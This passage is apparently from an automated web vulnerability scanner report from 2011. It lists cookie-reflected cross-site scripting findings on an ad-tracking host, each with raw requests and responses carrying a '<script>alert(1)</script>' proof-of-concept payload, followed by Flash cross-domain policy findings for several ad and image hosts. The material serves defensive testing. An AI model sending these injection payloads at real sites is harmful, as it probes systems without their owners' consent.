COMSCORE.BMX.Buddy.ServerTimeEpoch="1308010656";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p79727471",RecruitFrequency:0,Inv:"mtv_300x250",Version:3}],"MasterSettings":{"GlobalCook
...[SNIP]...
3.70. http://ar.voicefive.com/bmx3/node.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 17aab<script>alert(1)</script>be6c6e68589 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&17aab<script>alert(1)</script>be6c6e68589; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&17aab<script>alert(1)</script>be6c6e68589', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:
...[SNIP]...
3.71. http://ar.voicefive.com/bmx3/node.pli [ar_p84552060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 5ba0f<script>alert(1)</script>1268b518d38 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&5ba0f<script>alert(1)</script>1268b518d38; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&5ba0f<script>alert(1)</script>1268b518d38', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2
...[SNIP]...
3.72. http://ar.voicefive.com/bmx3/node.pli [ar_p91143664 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p91143664 cookie is copied into the HTML document as plain text between tags. The payload 6f37c<script>alert(1)</script>327ede0648b was submitted in the ar_p91143664 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&6f37c<script>alert(1)</script>327ede0648b; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&6f37c<script>alert(1)</script>327ede0648b', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1308010653";COMSCORE.BMX.Budd
...[SNIP]...
3.73. http://ar.voicefive.com/bmx3/node.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 1a430<script>alert(1)</script>0390c9245 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&1a430<script>alert(1)</script>0390c9245; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16066

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&1a430<script>alert(1)</script>0390c9245', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:3
...[SNIP]...
3.74. http://ar.voicefive.com/bmx3/node.pli [ar_p97464717 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p97464717 cookie is copied into the HTML document as plain text between tags. The payload 1ffeb<script>alert(1)</script>61108d79055 was submitted in the ar_p97464717 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&1ffeb<script>alert(1)</script>61108d79055; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
nReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&1ffeb<script>alert(1)</script>61108d79055', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14
...[SNIP]...
4. Flash cross-domain policy  previous  next
There are 77 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://0.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:20:45 GMT
Expires: Tue, 14 Jun 2011 00:25:45 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
4.2. http://1.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:20:43 GMT
Expires: Tue, 14 Jun 2011 00:25:43 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
4.3. http://2.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://2.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 2.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:30:12 GMT
Expires: Tue, 14 Jun 2011 00:35:12 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
4.4. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
4.5. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Mon, 13 Jun 2011 14:11:24 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
4.6. http://ads.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:1722"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
4.7. http://ar.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:16:22 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
4.8. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 14 Jun 2011 17:45:46 GMT
Date: Mon, 13 Jun 2011 17:45:46 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

